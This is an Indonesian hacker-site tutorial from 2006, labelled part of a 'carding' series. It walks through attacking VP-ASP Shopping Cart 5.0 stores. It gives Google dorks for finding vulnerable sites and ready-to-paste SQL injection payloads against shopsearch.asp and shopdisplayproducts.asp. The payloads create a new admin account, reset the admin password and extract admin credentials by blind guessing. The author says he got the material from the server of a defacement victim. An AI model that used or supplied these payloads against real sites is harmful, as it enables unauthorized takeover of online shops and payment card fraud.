� Back

� WWW.SPYROZONE.TK �

 

[156]. Tutorial Carding (Bagian X)

    

  

------------------------------------------------------

Author  : SPYRO KiD

Contact : SPYRO_ZONE@yahoo.com ==> WWW.SPYROZONE.TK

CopyLEFT (c) 2006 www.spyrozone.tk All Rights Reserved

� 28/09/2006  04:20:55 WIB

------------------------------------------------------

 

--------------------------------------

Tutorial ini spyro dapatkan dari suatu ftp seorang korban saat sedang mendeface webnya (lihat posting berjudul "Mengapa aku mendeface profil FS dan website Fun2Holic" (19 september 2006) di halaman Cerita Hari iNi.

--------------------------------------

 

'`%%`%%`%%,`%%'`% Materi ke-10 : VP-ASP Shopping Cart 5.0 Cara I`%%`%%`%%,`%%'`% '
!NB : SQL Injection vulnerability pada script 'shopsearch.asp'
1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopsearch.asp
2. Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values ('<USERNAME>')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='<PASSWORD>' where fldusername='<USERNAME>'--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where fldusername='<USERNAME>'--&SubCategory=All&action.x=33&action.y=6
jangan lupa untuk mengganti <USERNAME> dan <PASSWORD> sesuai selera!:
3. Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='<PASSWORD>' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
4. Untuk login admin, ada di http://.../vpasp/shopadmin.asp
 

'`%%`%%`%%,`%%'`% Materi ke-10 : VP-ASP Shopping Cart 5.0 Cara II`%%`%%`%%,`%%'`% '
!NB : SQL Injection vulnerability pada script 'shopdisplayproducts.asp'
1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopdisplayproducts.asp
1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopdisplayproducts.asp
2. Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
http://.../vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--
3. Ganti�lah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
dst...
4. Naah.. kalau berhasil, kita akan mendapatkan informasi username dan password admin!
5. Untuk login admin ke http://.../vpasp/shopadmin.asp
6. Demikanlah, Materi ke-10 Selesai.

 

   

/* ------------------------------|EOF|------------------------------ */

 

   � Back

� WWW.SPYROZONE.TK �